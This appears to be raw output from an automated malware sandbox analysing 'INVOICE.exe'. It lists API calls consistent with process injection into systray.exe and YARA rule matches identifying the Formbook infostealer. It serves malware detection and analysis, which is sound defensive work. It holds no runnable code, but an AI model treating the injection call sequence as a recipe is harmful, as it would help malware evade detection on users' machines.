          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AEB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AEA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AEAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9560 NtWriteFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AEA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AEA770 NtOpenThread,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041A050 NtClose,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00419F20 NtCreateFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00419FD0 NtReadFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041A0FA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00419F1A NtCreateFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00419FCC NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CA050 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CA100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CA0FA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9F1A NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9FCC NtReadFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_73701A98
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041E034
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041D166
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00401177
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041DA6E
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041DB50
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041E3F5
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041D403
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041DD62
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041D565
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00409E2C
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00409E30
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B720A8
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB090
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B728EC
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B7E824
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61002
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAF900
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B722AE
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5FA2B
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADEBB0
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD138B
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B523E3
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6DBD2
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B603DA
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADABD8
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B72B28
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACAB40
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B4CB4F
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB841F
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6D466
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2581
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABD5E0
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B725DD
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA0D20
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B72D07
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B71D55
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B72EF7
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC6E30
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6D616
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B71FF1
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B7DFCE
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041E034
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041D166
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00401177
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041DA6E
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041DB50
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041E3F5
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041D403
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041DD62
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041D565
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00409E2C
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00409E30
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0488D466
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048925DD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047C0D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04892D07
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047DD5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04891D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047F2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047E6E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04892EF7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0488D616
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0489DFCE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04891FF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048920A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EA830
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048928EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0489E824
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047F20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047DB090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047E4120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047CF900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047E99BF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048922AE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884AEF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0487FA2B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EAB40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048803DA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0488DBD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048723E3
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EA309
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04892B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FABD8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0486CB4F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FEBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047F138B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CD166
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CE3F5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CD403
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005B2D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005B9E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005B9E2C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005B2FB0
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: String function: 00AAB150 appears 136 times
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: String function: 0041BDA0 appears 38 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 047CB150 appears 136 times
          Source: INVOICE.exe, 00000000.00000003.200123102.0000000009B06000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INVOICE.exe
          Source: INVOICE.exe, 00000001.00000002.275741990.00000000007D3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs INVOICE.exe
          Source: INVOICE.exe, 00000001.00000002.276092694.0000000000D2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INVOICE.exe
          Source: INVOICE.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@4/2
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
          Source: C:\Users\user\Desktop\INVOICE.exeFile created: C:\Users\user\AppData\Local\Temp\nsj921F.tmpJump to behavior
          Source: INVOICE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INVOICE.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: INVOICE.exeReversingLabs: Detection: 65%
